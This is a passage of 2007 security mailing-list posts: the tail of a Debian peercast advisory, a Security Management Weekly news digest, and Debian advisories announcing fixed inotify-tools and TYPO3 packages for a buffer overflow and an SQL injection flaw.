Size/MD5 checksum: 49864 37f0fbae6d44b97560f48395e5f8ce07

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_sparc.deb

Size/MD5 checksum: 200202 d2a2f10914b13a92838ab4d67b1ad53f


These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHdSRXXm3vHE4uyloRAji4AJ9ET3BJLen3W9SuXsPQxpGU5M2eZwCfcJyi
tkA5pl81aqmM4CpPb89TjzQ=
=LAfB
-----END PGP SIGNATURE-----


--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Security Management Weekly - December 28, 2007

header

  Learn more! ->   sm professional  

December 28, 2007
 
 
CORPORATE SECURITY  
  1. " City is Doubling Police Program to Reduce Crime" Operation Impact in New York City
  2. " Shining Light on Nonlethal Weapons" LED Incapacitator
  3. " Games Aid Emergency Management" Interactive Training Simulations
  4. " Stadium Security a Concern at Colleges" College Stadiums at Risk
  5. " Corporate Crime on the Rise" PricewaterhouseCooper Survey

HOMELAND SECURITY  
  6. " Benazir Bhutto Killed" Suicide Attack in Rawalpindi
  7. " Pakistan in Crisis as Bhutto Buried" 22 Killed Since Assassination
  8. " Experts Say Instability Puts Country on 'Dangerous' Path" Assassination of Benazir Bhutto
  9. " US Forces Identify Slain Qaeda Militant in Iraq" Abu Abdullah
  10. " FBI Prepares Vast Database of Biometrics" $1 Billion Campaign
  11. " Harboring Safety" Port of Halifax

CYBER SECURITY  
  12. " Cyber Security Threats To Pipelines And Refineries"
  13. " Information Security Standards" Best Practices
  14. " DHS Puts Cybersecurity Toward Top of 2008 To-Do List" Cybersecurity Template for Future
  15. " Herd Intelligence Benefits IT Security" Collecting Threat Information from Customers' Computers


   






 

"City is Doubling Police Program to Reduce Crime"
New York Times (12/27/07) ; Baker, Al

New York City Mayor Michael Bloomberg announced that every new N.Y. police officer will join the Operation Impact program, which pairs new recruits with veteran officers in small, designated areas of the city. The program, which began in 2003, is cited as one of the main reasons that crime has dramatically declined in the city. City officials estimate that there will be less than 500 homicides in 2007, which would be the lowest number for any year since reliable statistics were made available in 1963. Overall, crime has fallen by 6.3 percent since 2006. However, six of the city's 76 police precincts have seen an increase in crime, mostly in Brooklyn. In order to further reduce crime, the 900 officers currently in the program will continue to participate, with 914 recruits joining Operation Impact. Approximately one-third of the 1,800 officers will be sent to six precincts in Brooklyn that are plagued by the highest crime rates. Although the program has been a success, the city is still suffering from a recruiting shortage. The department has budgeted to hire 2,400 new officers, but police officials estimate that the next class at the police academy will consist of only 1,000 new recruits. Some city officials blame a low starting salary for the lack of interest.
(go to web site)

"Shining Light on Nonlethal Weapons"
Security Management (12/07) Vol. 51, No. 12, P. 24 ; Spadanuta, Laura

Torrance, Calif.-based Intelligent Optical Systems has developed the LED Incapacitator (LEDI), a nonlethal weapon that temporarily blinds people and makes them feel nauseated. The device, which resembles a flashlight, features bright light emitting diodes (LEDs) that prevent eyes from focusing for several seconds, similar to the impact of a magnified picture flash. The LEDI has several advantages over other nonlethal weapons, according to Los Angeles County Sheriff's Department Commander Sid Heal, who consulted on the device. For instance, the LEDI does not have any lasting effects after a person becomes adjusted to the visual over stimulation. And, unlike pepper spray, which can sometimes hit police officers as well as suspects when used during an incident, there is no risk of cross contamination. There are other benefits as well. Heal noted that there are not any additional expenses related to the LEDI after the purchase of the flashlight and the rechargeable batteries that power it. The device could eventually be used by law enforcement and security forces to subdue violent subjects, depending on how well it does in tests at the Pennsylvania State University's Institute for Non-lethal Defense Technologies.
(go to web site)

"Games Aid Emergency Management"
Security Management (12/07) Vol. 51, No. 12, P. 32 ; Straw, Joseph

Emergency management professionals have two options for disaster planning training: meeting-based tabletop exercises, and field tests involving managers and volunteer "victims." While both of these options are critical, they are also expensive and time consuming. A cheaper and more flexible option is game-based interactive training simulations. One of these game-based simulators is called Zero Hour. During the simulation, players must make critical operational decisions during a simulated anthrax attack and respond to questions from fictional characters who report to an inoculation center. Players must also juggle simulated phone calls and requests for added equipment. Currently, the Department of Energy is designing a game called "Ground Truth," which simulates an event manager's response to a chemical tanker truck leak. The player orchestrates the simulation's hazmat response team's operations with the goal of limiting casualties. The player can direct team members to close streets for evacuation and to evacuate citizens, among other orders. The game's designers hope to soon expand the game to include a simulated biological attack scenario as well, and to include common challenges like equipment failures or communication difficulties.
(go to web site)

"Stadium Security a Concern at Colleges"
Associated Press (12/26/07) P. C11

College football stadiums must step up security in order to prevent against an inevitable terrorist attack, security experts warn. College stadiums, which contain tens of thousands of spectators during sporting events, in general lack the basic security measures observed by professional stadiums, and few have a high emphasis on security. "What we found is that there's a need for athletic administrators, campus police, emergency medical service, for all those people to have training," says Rep. Bernie Thompson (D-Miss.), chairman of the House Homeland Security Committee, who believes colleges should avoid cutting corners and must begin investing in security training.
(go to web site)

"Corporate Crime on the Rise"
London Free Press (Canada) (12/17/07) ; Musgreave, John; Porter, Graham

Losses stemming from corporate crime have increased substantially over the last two years, though the majority of companies have faith in their existing fraud controls, according to results from PricewaterhouseCooper's (PwC) 2007 global economic crime survey. The poll revealed that 43 percent of international survey respondents experienced corporate crime in 2007, and that their reported losses due to crime grew from $1.7 million in 2005 to $2.4 million in 2007, on average. Nevertheless, roughly half of the global companies polled believe it is "very unlikely" that they will suffer from corporate crime in the near future, says Bruce Webster of PwC. This perspective suggests that many organizations are insufficiently aware of the danger of corporate fraud. And while over 60 percent of Canadian companies surveyed have enhanced their security controls since 2005, 67 percent of those companies still lack fraud-related training programs, and 36 percent have not instituted a "whistleblower" hotline. Without such anti-fraud controls, companies put themselves at risk for economic crime and decrease the odds of detecting fraud, says Webster. Indeed, almost 40 percent of corporate crime incidents reported by Canadian businesses were discovered by chance. The survey also revealed that 30 percent of reported international fraud incidents were cases of asset misappropriation, which is the easiest type of fraud to identify; however, many businesses do not see asset misappropriation as a threat. Also, employees were to blame for the most grave fraud transgressions, according to 67 percent of victimized Canadian companies. The PwC survey notes that control systems must be supplemented by a robust corporate culture in order to detect and deter fraud, and that fraud controls must be routinely reviewed and updated.
(go to web site)

"Benazir Bhutto Killed"
Associated Press (12/27/07)

Former Pakistani Prime Minister Benazir Bhutto was killed in an apparent suicide attack in the military garrison town of Rawalpindi, according to her aides, throwing Pakistan's political system into a new round of turmoil. Bhutto was emerging from a political rally in Rawalpindi when an attacker fired shots and detonated himself, according to news reports from Pakistan. At least a dozen people are believed dead from the blast. Police said a suicide bomber fired shots at Bhutto as she was leaving the rally venue in a park before blowing himself up.
(go to web site)

"Pakistan in Crisis as Bhutto Buried"
Reuters (12/28/07) ; Aziz, Faisal

Former prime minister Benazir Bhutto was buried Friday in southern Pakistan, a day after her assassination began a wave of violence across the country. At least 16 people have been killed in the Sindh province since Bhutto was shot and killed, and a bomb killed six people at an election meeting in northwest Pakistan. Hundreds of vehicles were burned and crowds blocked the streets in Sindh to protest against the rule of President Pervez Musharraf. Although al-Qaeda is believed to be behind the assassination, many of Bhutto's supporters blame Musharraf and the United States for her death. President Bush joined other world leaders in condemning the murder of Bhutto, urging Pakistan to hold its scheduled elections on Jan. 8, 2008. Pakistan Prime Minister Mohammadmian Soomro said that election plans had not changed, but experts fear that a prolonged wave of violence could make it impossible to hold peaceful elections in less than two weeks. Former prime minister Nawaz Sharif, a political rival of Bhutto, said that his party would not participate in the January election. The United States had hoped that Bhutto, who spoke out against Islamic extremist violence, would prove to be a valuable ally in the fight against al-Qaeda forces.
(go to web site)

"Experts Say Instability Puts Country on 'Dangerous' Path"
Boston Herald (12/28/07) ; Fargen, Jessica

The assassination of Benazir Bhutto in Pakistan could destabilize the nation and provide terrorists with greater leeway in the Middle East, according to several experts. Boston University Pakistani International Politics Professor Adil Najam says, "This might be the most important blow the terrorists have struck since 9/11, because it could tip over this critical country." Many are concerned about a military crackdown on protests and other demonstrations, which would ultimately divide the army's loyalties and strengthen extremists' campaigns to take over the nation. However, Stratfor.com's George Friedman believes if the military can remain as a cohesive unit, Pakistan will make it through this dangerous crisis. Meanwhile, world leaders continue to condemn the assassination.
(go to web site)

"US Forces Identify Slain Qaeda Militant in Iraq"
Agence France Presse (12/26/07)

The U.S. military in Iraq said on Wednesday it had identified a slain militant killed last month near the restive town of Samarra as a key fighter from the Al-Qaeda group. Abu Abdullah, also known as Muhammad Sulayman Shunaythir al-Zubai, was killed in an operation on November 8 south of Samarra in central Iraq. Abdullah was a high-level Al-Qaeda in Iraq leader for a network operating in Salaheddin province, was also allegedly responsible for the kidnapping, extortion and murder of local Iraqis, and he is believed to have "led a group of foreign terrorists, whom he used to conduct his car-bombing campaigns." "Intelligence indicates that Abdullah had historical ties to the battle of Fallujah in 2004, and was a close contact of the former Al-Qaeda in Iraq leader Abu Musab al-Zarqawi," an army statement said. Zarqawi was killed in a US air strike in June 2006.
(go to web site)

"FBI Prepares Vast Database of Biometrics"
Washington Post (12/22/07) P. A1 ; Nakashima, Ellen

The Federal Bureau of Investigation is initiating a $1 billion campaign to construct the world's biggest computer database on individuals' physical traits, a plan that would provide the U.S. government new ways to locate people in this country and overseas. In January, the FBI plans to grant a decade-long deal that would substantially broaden the amounts and types of biometric data it gets. In the future, law-enforcement officials globally will be able to depend on iris patterns, face-shape information, scars, and possibly even the individual way humans walk and speak, to solve crimes and find criminals and terrorists. In addition, the FBI will keep, upon request by companies, the fingerprints of staff who have been subjected to criminal background checks so the companies can be contacted if workers have problems with the law. If successful, the FBI's Next Generation Identification system will obtain a broad variety of data in one location for forensic and identification reasons.
(go to web site)

"Harboring Safety"
Access Control & Security Systems (11/01/07) Vol. 50, No. 12, P. 18 ; Silk, Stephanie

Under the Marine Transportation Security Act implemented by Transport Canada in 2005, the Port of Halifax was required to institute an access control database system and a biometric credentialing tool to enhance security at a facility where Halifax Port Authority manager Gord Helm says it is virtually impossible to block the flow of traffic. The port opted for Identica Canada Corporation's Vascular Pattern Scanner, which scans veins, arteries, and capillaries just below the skin to verify a person's identity. Users are given smart cards that store the template of their vein patterns, and the stored template is matched to the hand placed on the scanning device. Additionally, the port chose the ImmediaC database from Unisys to ensure full integration with the credentialing reservation system already in place. When the system goes live in early 2008, it will comprise as many as 50 scanners and 4,000 users.
(go to web site)

"Cyber Security Threats To Pipelines And Refineries"
Pipeline & Gas Journal (11/07) Vol. 234, No. 11, P. 56 ; Williams, Tyler

The cyber security threat to critical infrastructure systems continues to be a clear and present danger. Terrorists and hackers that want to paralyze the United States could deal a devastating blow by disabling key infrastructure systems such as power plants, oil and gas pipelines and refineries. Pipelines are especially vulnerable because they tend to be located in unpoliced and isolated areas. Although the Supervisory Control and Data Acquisition (SCADA) system offers a measure of protection, an entire pipeline could be taken out of commission if an attacker gained access to a physical Ethernet port at a field site. An combined cyber and physical attack also poses major implications, particularly if an attacker accesses critical servers in a SCADA control center. By infiltrating a server in the control center, the hacker could feed false information to the asset owner, making it appear as though an event was in the making at a far off site in a bid to distract emergency sources at the site so that it could target another critical site at a separate location. While such an attack seems far-fetched, several power companies in the U.S. routinely report instances of hackers trying to circumvent their security to tap into their computer networks. A similar event took place in Estonia this spring after hackers pummeled the government and other Website with cyber attacks as retribution for the removal of a beloved Russian war memorial there.
(go to web site)

"Information Security Standards"
Risk Management (12/07) Vol. 54, No. 12, P. 11 ; Lindenmayer, Gerhard

For many organizations, the most essential asset is information, which means organizations must implement security measures to ensure data is not inadvertently or maliciously compromised. Certain best practices exist for securing network data. A layered approach--which combines technology, policy, training, and enforcement--is the best way to achieve full protection. Encryption, antivirus software, and firewalls are key technological elements of data security. Adopting an intrusion detection system helps safeguard the network infrastructure and notifies the IT department when problems occur. In addition, it is crucial to train employees regarding the data in their control and to enforce a robust password policy. Workers should have a limited ability, if any, to use memory sticks, CD/DVD drives, and other portable USB storage devices; though strict, this policy will prevent data from being carried away from the premises. Restricting workers' Internet access to work-related sites also keeps the network safe from viral downloads. Finally, it is important to have outside consultants conduct regularly scheduled patches and yearly penetration tests. Businesses that utilize credit cards for online transactions should scan their servers and ports at least four times each year to adhere to the Payment Card Industry Data Security Standard.
(go to web site)

"DHS Puts Cybersecurity Toward Top of 2008 To-Do List"
Federal Computer Week (12/13/07) ; Bain, Ben

In his year-end remarks, Department of Homeland Security (DHS) Secretary Michael Chertoff announced that cybersecurity will be one area of DHS' four key areas of focus in 2008. Indeed, DHS and Congress are collaborating to design a cybersecurity model that Chertoff envisions as the template for the next 10 years regarding how the United States handles the growing cybersecurity threat. Chertoff says this emphasis on cybersecurity is driven by the realization that much of the nation's economic health "depends on our ability to use the Internet and to use data systems in order to perform our work." Secure identification, immigration and border security, and a push to "institutionalize" the agency's operations are the other areas slated to receive heightened attention in 2008. However, many lawmakers were disappointed that DHS did not classify public safety interoperable communication efforts, including fusion centers and information sharing programs, as a vital area of focus for 2008.
(go to web site)

"Herd Intelligence Benefits IT Security"
InfoWorld (12/26/07) ; Hines, Matt

In response to a boom in customized malware, security vendors are switching strategies and are now utilizing customers' computers as threat detection information collectors. Indeed, malware authors are now using more malware toolkits to develop different attacks for almost every individual user. Therefore, "herd intelligence" will enable customers' computers to act as eyes and ears that can spot customized threats, says Andrew Jaquith of Yankee Group. Customers' endpoint devices can then channel data about new attacks into global networks of scanning technologies, thereby helping security vendors staunch the tide of smaller volume, lower profile attacks. Meanwhile, the amassed data could also help vendors guide customers away from Web sites or applications that are risky to use. As part of the "herd intelligence" initiative, security vendors may have to collaborate with their competitors to develop a larger network effect. "Scale enables the herd to counter malware authors' strategy of spraying huge volumes of unique malware samples with, in essence, an Internet-sized sensor network," explains Jaquith. However, the effort has disadvantages, include cost, dealing with false positives, safeguarding customers' privacy and data, and handling the "data glut" produced by the anti-malware herd networks.
(go to web site)

Abstracts Copyright © 2007 Information, Inc. Bethesda, MD


  ASIS also offers a daily and a non-sponsored, special-content Professional Edition of
Security Newsbriefs. Please click to see a sample or to contact us for more information.

Unsubscribe | Change E-mail | Advertising Opportunities | Security Management Online | ASIS Online

[SECURITY] [DSA 1440-1] New inotify-tools packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1440-1 security@debian.org
http://www.debian.org/security/

Moritz Muehlenhoff
December 28, 2007

http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : inotify-tools
Vulnerability : buffer overflow
Problem type : local
Debian-specific: no
CVE Id(s) : CVE-2007-5037
Debian Bug : 443913

It was discovered that a buffer overflow in the filename processing of
the inotify-tools, a command-line interface to inotify, may lead to
the execution of arbitrary code. This only affects the internal
library and none of the frontend tools shipped in Debian.

For the stable distribution (etch), this problem has been fixed in
version 3.3-2.

The old stable distribution (sarge) does not provide inotify-tools.

For the unstable distribution (sid), this problem has been fixed in
version 3.11-1.

We recommend that you upgrade your inotify-tools package.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2.dsc

Size/MD5 checksum: 624 883ee55627b7becb5a9ca1a2e569281b

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3.orig.tar.gz

Size/MD5 checksum: 369780 204ef6e0b855ec4315f4f13e2d3d1e1a

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2.diff.gz

Size/MD5 checksum: 5311 7bde9f27b0bb470a44d64b40b1e217e1

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_alpha.deb

Size/MD5 checksum: 51356 81b86adf6ba52bac0c463948cbbe2b49

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_amd64.deb

Size/MD5 checksum: 44668 b64ada55dc7a779df25b8aaf69347ef0

arm architecture (ARM)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_arm.deb

Size/MD5 checksum: 41972 6a7d420d5d00261ad40cc12ada606144

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_hppa.deb

Size/MD5 checksum: 48782 0f85ebaecd2c1449afc7c31bbf1b1ac5

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_i386.deb

Size/MD5 checksum: 78260 e462da2503c92d98510647fb0c1f44eb

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_ia64.deb

Size/MD5 checksum: 58450 f3e9432dd2725689a945e85f4c9a6fc3

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_mips.deb

Size/MD5 checksum: 44252 d7166ae065ed439dfee037a20ce2f7eb

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_mipsel.deb

Size/MD5 checksum: 43936 903bb81400b5769e787a871634335188

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_powerpc.deb

Size/MD5 checksum: 49284 145b4a75de5c8abaf38390f1f69789e0

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_s390.deb

Size/MD5 checksum: 45262 9346fa472ba657b973fd7c837b94024c

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/i/inotify-tools/inotify-tools_3.3-2_sparc.deb

Size/MD5 checksum: 43658 eb008682403c08de1baa65d79f46eaa5


These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHdRy/Xm3vHE4uyloRAkwZAJ9ajEHfvb0PvpkF1DhmKvqABmAWygCfagS1
upns1li4gZWjtYIUUmNZuVk=
=VFim
-----END PGP SIGNATURE-----


--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

[SECURITY] [DSA 1439-1] New typo3-src packages fix SQL injection

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1439-1 security@debian.org
http://www.debian.org/security/

Thijs Kinkhorst
December 28, 2007

http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : typo3-src
Vulnerability : missing input sanitising
Problem-Type : remote
Debian-specific: no
CVE ID : CVE-2007-6381
Debian Bug : 457446

Henning Pingel discovered that TYPO3, a web content management framework,
performs insufficient input sanitising, making it vulnerable to SQL
injection by logged-in backend users.

For the stable distribution (etch), this problem has been fixed in
version typo3-src 4.0.2+debian-4.

The old stable distribution (sarge) doesn't contain typo3-src.

For the unstable distribution (sid) and for the testing distribution
(lenny), this problem has been fixed in version 4.1.5-1.

We recommend that you upgrade your typo3-src packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-4.diff.gz

Size/MD5 checksum: 13795 c88de483225fb01726b21b1c5c6754da

http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian.orig.tar.gz

Size/MD5 checksum: 7683527 be509391b0e4d24278c14100c09dc673

http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-4.dsc

Size/MD5 checksum: 902 faf88b5c6ae931fb4ce919a9e8c501c4

Architecture independent packages:

http://security.debian.org/pool/updates/main/t/typo3-src/typo3_4.0.2+debian-4_all.deb

Size/MD5 checksum: 76268 2004e720cca629d8e29c0689ad4ca5b8

http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src-4.0_4.0.2+debian-4_all.deb

Size/MD5 checksum: 7686574 c7da1b1f0f98ce3e3ed98cf46fe71ba4


These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHdRjTXm3vHE4uyloRAmBZAJ93cWZ7ErHiI4k3AjItEdA98qXx6wCgmNJ1
E2Cllaa0gTQgaiS2lXavrrY=
=pbJ3
-----END PGP SIGNATURE-----

--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org